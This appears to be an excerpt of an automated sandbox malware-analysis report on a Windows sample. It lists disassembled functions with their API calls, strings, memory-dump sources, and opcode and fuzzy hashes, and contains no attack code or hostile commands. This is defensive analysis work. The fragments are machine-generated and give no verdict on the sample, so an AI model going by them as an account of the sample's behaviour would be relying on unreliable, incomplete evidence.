                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                    • String ID: <local>
                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                    • Opcode ID: 3fb26dd57057a6a8271f00363b3acb050c102a51b10261416f71866257fc32a1
                                                                                                                    • Instruction ID: 0f4b224a23c02b3d2f7240da687f98b215f0921763b361821870126802ec4316
                                                                                                                    • Opcode Fuzzy Hash: 3fb26dd57057a6a8271f00363b3acb050c102a51b10261416f71866257fc32a1
                                                                                                                    • Instruction Fuzzy Hash: 51110E70541A25BEDF2A8F518C88EFBFBACFF06751F108A2AF98586400D3706890D6F0
                                                                                                                    Function 0033092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00323C14,003E52F8,?,?,?), ref: 0033096E
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                    • _wcscat.LIBCMT ref: 00364CB7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FullNamePath_memmove_wcscat
                                                                                                                    • String ID: S>
                                                                                                                    • API String ID: 257928180-3032909728
                                                                                                                    • Opcode ID: a7fd055bdf4722c7067e6481e6a801cf8240a0768fa576f0fa30b41d100b76fc
                                                                                                                    • Instruction ID: 2bce7b41de0261ceb4f7869e43f5ad9dc1a4af8688ceb520202019f982ddfff7
                                                                                                                    • Opcode Fuzzy Hash: a7fd055bdf4722c7067e6481e6a801cf8240a0768fa576f0fa30b41d100b76fc
                                                                                                                    • Instruction Fuzzy Hash: 2811A135A05218ABCB47EBA4D886FDD73ECFF09341F0045A5B949DB2A1EBB0A6844B10
                                                                                                                    Function 00378E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                      • Part of subcall function 0037AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0037AABC
                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00378E73
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: 73026fb85d17cacf8db6acbded0c575a1da8f058dcbd15d02bf7911f8aee5a21
                                                                                                                    • Instruction ID: 6c769de75d031583c7b95ddd48206ee5c42be50e4a53da46549446039b778b44
                                                                                                                    • Opcode Fuzzy Hash: 73026fb85d17cacf8db6acbded0c575a1da8f058dcbd15d02bf7911f8aee5a21
                                                                                                                    • Instruction Fuzzy Hash: 6F01F572645228AB8B26EBA0CC46CFE736CAF06320B044A19F8255B6E1EF355808D690
                                                                                                                    Function 00378CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                      • Part of subcall function 0037AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0037AABC
                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00378D6B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: 4d12126e02d4b03e43d47a142572d37b3173bfde541e9bfd615c79f13196a2e0
                                                                                                                    • Instruction ID: 4b8db47b26e3e5de185b9eb18469c20fd93e297c9af97e1244bf15ff0c0b3691
                                                                                                                    • Opcode Fuzzy Hash: 4d12126e02d4b03e43d47a142572d37b3173bfde541e9bfd615c79f13196a2e0
                                                                                                                    • Instruction Fuzzy Hash: B801F772B81118ABCB37EBE0D956EFE77ACDF15340F104019B8096B2E1DE255E08D2B1
                                                                                                                    Function 00378D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                      • Part of subcall function 0037AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0037AABC
                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00378DEE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: d32c4455db4bf96c668cc02ff77d11e4ef7a238f26f8698e23632a1fddbbadb3
                                                                                                                    • Instruction ID: c6b74dfe117ca1ed44d05c4913eeb6095b92fa67a406c1c78c57951359e7f0e5
                                                                                                                    • Opcode Fuzzy Hash: d32c4455db4bf96c668cc02ff77d11e4ef7a238f26f8698e23632a1fddbbadb3
                                                                                                                    • Instruction Fuzzy Hash: D9012B72A85118B7CB37E7E4D956EFE77ACDF11300F104015B809A72D1DE254E08D2B1
                                                                                                                    Function 0037C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0037C534
                                                                                                                      • Part of subcall function 0037C816: _memmove.LIBCMT ref: 0037C860
                                                                                                                      • Part of subcall function 0037C816: VariantInit.OLEAUT32(00000000), ref: 0037C882
                                                                                                                      • Part of subcall function 0037C816: VariantCopy.OLEAUT32(00000000,?), ref: 0037C88C
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0037C556
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                    • String ID: d}=
                                                                                                                    • API String ID: 2932060187-1919349060
                                                                                                                    • Opcode ID: 3480e730613060263f486fb3e898f0d0620507d9e3b9985a3cc4073775e90d03
                                                                                                                    • Instruction ID: 2b328790d58cd7ee990ecf8de3d54f4ee59d611ec3e96be6528d85c2b7687feb
                                                                                                                    • Opcode Fuzzy Hash: 3480e730613060263f486fb3e898f0d0620507d9e3b9985a3cc4073775e90d03
                                                                                                                    • Instruction Fuzzy Hash: 63111E729007089FC721DFAAD88499AF7F8FF18310B50862FE58AD7611E771AA44CF90
                                                                                                                    Function 00384F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName_wcscmp
                                                                                                                    • String ID: #32770
                                                                                                                    • API String ID: 2292705959-463685578
                                                                                                                    • Opcode ID: 60cff8edd10f043c1bc07aafa57ee7bc437a7e963c0a58677593bfbab7670d0d
                                                                                                                    • Instruction ID: 428c44c9f24d4f623224ba7193a959b569a078940a9c419e2452f83fed9de309
                                                                                                                    • Opcode Fuzzy Hash: 60cff8edd10f043c1bc07aafa57ee7bc437a7e963c0a58677593bfbab7670d0d
                                                                                                                    • Instruction Fuzzy Hash: 8CE061336003282BD3219795AC45FA7F7ECDB52B70F000157FD00D7040D560AA0187D0
                                                                                                                    Function 0035B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0035B314: _memset.LIBCMT ref: 0035B321
                                                                                                                      • Part of subcall function 00340940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0035B2F0,?,?,?,0032100A), ref: 00340945
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0032100A), ref: 0035B2F4
                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0032100A), ref: 0035B303
                                                                                                                    Strings
                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0035B2FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                    • API String ID: 3158253471-631824599
                                                                                                                    • Opcode ID: 32824bb1b8189b0fb029dc3797ee18f7dd03a3d74d65ea00c221942eb2bbc638
                                                                                                                    • Instruction ID: aa125dfd12d74213df377b25953eb36d0bcee6d536b74b47e9e7294e1dd42dd9
                                                                                                                    • Opcode Fuzzy Hash: 32824bb1b8189b0fb029dc3797ee18f7dd03a3d74d65ea00c221942eb2bbc638
                                                                                                                    • Instruction Fuzzy Hash: A0E092782007508FD723DF78E504B42BBE8AF00305F008E6CE896DB261E7B4E808CBA1
                                                                                                                    Function 00361935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 00361775
                                                                                                                      • Part of subcall function 0039BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0036195E,?), ref: 0039BFFE
                                                                                                                      • Part of subcall function 0039BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0039C010
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0036196D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                    • String ID: WIN_XPe
                                                                                                                    • API String ID: 582185067-3257408948
                                                                                                                    • Opcode ID: 60ba767de972f963b7d92949fe8b20190831c29ff462f8cce2af810e4603f833
                                                                                                                    • Instruction ID: b2b8d5af51576706eb3f4727a8065c5eaf15810a509dd386fde16104b5d08f24
                                                                                                                    • Opcode Fuzzy Hash: 60ba767de972f963b7d92949fe8b20190831c29ff462f8cce2af810e4603f833
                                                                                                                    • Instruction Fuzzy Hash: 13F0C272800109DFDB27DBA1DA88AECBBFCAB18301F684095E102A64A4D7719F84DF60
                                                                                                                    Function 003A5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A596E
                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003A5981
                                                                                                                      • Part of subcall function 00385244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003852BC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                    • Opcode ID: 25bc3c7f64beaa68ddbb71facde3a0b9d13834f74afd15a5cae13da4abf5822c
                                                                                                                    • Instruction ID: f86f0859c5d4731568448b11e604e4b6b60a19d6a538cd8813269b257dcbc4b9
                                                                                                                    • Opcode Fuzzy Hash: 25bc3c7f64beaa68ddbb71facde3a0b9d13834f74afd15a5cae13da4abf5822c
                                                                                                                    • Instruction Fuzzy Hash: 9DD0C936784311BAE665BBB0AC4BFD66A59AB02B51F000825B249AA1E0C9E0A800C654
                                                                                                                    Function 003A5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A59AE
                                                                                                                    • PostMessageW.USER32(00000000), ref: 003A59B5
                                                                                                                      • Part of subcall function 00385244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003852BC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                    • Opcode ID: ec5c197ec957d21238c423ec7816372226ad918c839269d1dfd80f3300d27c16
                                                                                                                    • Instruction ID: 9c6516579040aaf8da76f6d7eb897a4e5883b01be4bbb744f4d0e3590bd88808
                                                                                                                    • Opcode Fuzzy Hash: ec5c197ec957d21238c423ec7816372226ad918c839269d1dfd80f3300d27c16
                                                                                                                    • Instruction Fuzzy Hash: E0D0C9327803117AE666BBB0AC4BFD66659AB06B51F000825B245AA1E0C9E0A800C658